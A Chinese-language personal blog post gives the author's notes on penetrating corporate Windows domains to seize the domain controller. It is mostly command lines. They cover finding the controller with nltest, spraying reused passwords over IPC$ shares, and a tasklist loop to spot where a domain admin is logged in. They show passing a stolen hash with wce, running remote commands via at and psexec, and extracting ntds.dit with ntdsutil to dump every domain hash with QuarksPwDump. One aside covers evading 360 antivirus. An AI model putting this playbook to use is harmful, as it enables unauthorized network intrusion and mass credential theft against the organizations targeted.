前一陣子一直無心打理部落格，沒想到我這個爛部落格還有挺多人看的….正好春節，給大家拜個年，順便寫點東西。

最近在研究內網滲透，也搞了一些實際案例，以前一直在法克發東西，本來想把擼的一個不錯的內網寫出來分享，結果春節法克關了。。蛋疼，等開了再發吧。

寫點最近做的學習筆記，關於內網滲透以及域滲透的。

很多大公司的內網都會使用域來管理電腦，當然對於域來說，至高無上的就是DC，也就是域控制器。那麼當我們拿到內網的一個域成員之後，怎樣去滲透域控呢？

關於這方面的文章很多，也有很多大牛做過討論，我就大概寫點自己的思路。

首先要找到域控在哪裡，這裡有很多方法，我說一個我自己常用的，利用nltest

nltest /dsgetdc:域名 找域控 
或者使用dc列表 nltest /dclist:domain-a 其中pdc是主域控
nltest /domain_trusts可以列出域之間的信任關係
net user /domain
 檢視域裡面的使用者

找到域控之後，可以試著掃一下開放的埠，然後用常規方法滲透比如web、資料庫等等。

內網中最致命的一個地方在於很多管理員用同一口令，所以每當我拿下一臺內網的伺服器，第一件事就是抓密碼和hash，然後利用ntscan或者netscan掃描一下同密碼的共享和ipc$，有時候能拿不少機器，運氣好域控就拿下來了。

當我們通過上一步拿到了一小批域成員賬戶時，可以用tasklist去檢視有沒有域管理登陸過，如果運氣好，看到下面的圖片情形，就表示有域控登陸過，直接wce抓hash，域控就搞定了，這也是很不錯的一個方法。

當然一個一個去登入機器然後tasklist不是一個好的方法，我們可以這樣做

Tasklist /s x.x.x.x /u username  /p password /v

FOR /F %i in (ips.txt) DO @echo [+] %i && @tasklist /V /S %i /U user /P password 2>NUL > output.txt &&

FOR /F %n in (names.txt) DO @type output.txt | findstr %n > NUL && echo [!] %n was found running a process on %i && pause

這樣可以方便快捷的尋找。

如果我們獲得了域控的hash，要怎麼登入域控呢？首先可以解密，運氣好能解出明文，但是往往域控的密碼都比較複雜，我們可以直接傳遞hash。

msf有個smb登入的方法，但是會被360殺掉，我們可以用wce修改會話憑據

wce -s Administrator:20121213-0026:004AD741EB01978BAAD3B435B51404EE:272C677DA534166433E35FC255DC444A

修改完之後直接net use \\x.x.x.x 我們就以當前的會話憑據建立起ipc$辣~~

然後想幹啥都行了，最基本的使用at。

net time \\192.168.4.6

at \\192.168.204.2 22:28 cmd /c "ipconfig>>c:\1.txt"

psexec /accepteula 繞過第一次驗證視窗

Psexec -s \\192.168.4.6 cmd.exe 建立ipc之後psexec連線

拿到域控之後要做什麼呢？當然都懂得，dump域成員hash，很多公司域成員和郵件系統、oa什麼都是通的，所以dump一個雜湊列表是很有必要的。

dump雜湊的方法有很多，我還是說一個我常用的，首先匯出ntds.dit

ntdsutil snapshot "activate instance ntds" create quit quit 
ntdsutil snapshot "mount {GUID}" quit quit 
copy  MOUNT_POINT\windows\NTDS\ntds.dit  c:\ntds.dit 
ntdsutil snapshot "unmount {GUID}" quit quit 
ntdsutil snapshot "delete {GUID}" quit quit

QuarksPwDump.exe --dump-hash-domain --ntds-file c:\ntds.dit

然後用這份列表裡的成員和雜湊就可以更大規模的滲透了！

上面只是個人總結的域滲透的一些小tips，實際方法要多得多。拋個磚頭，歡迎大家引玉。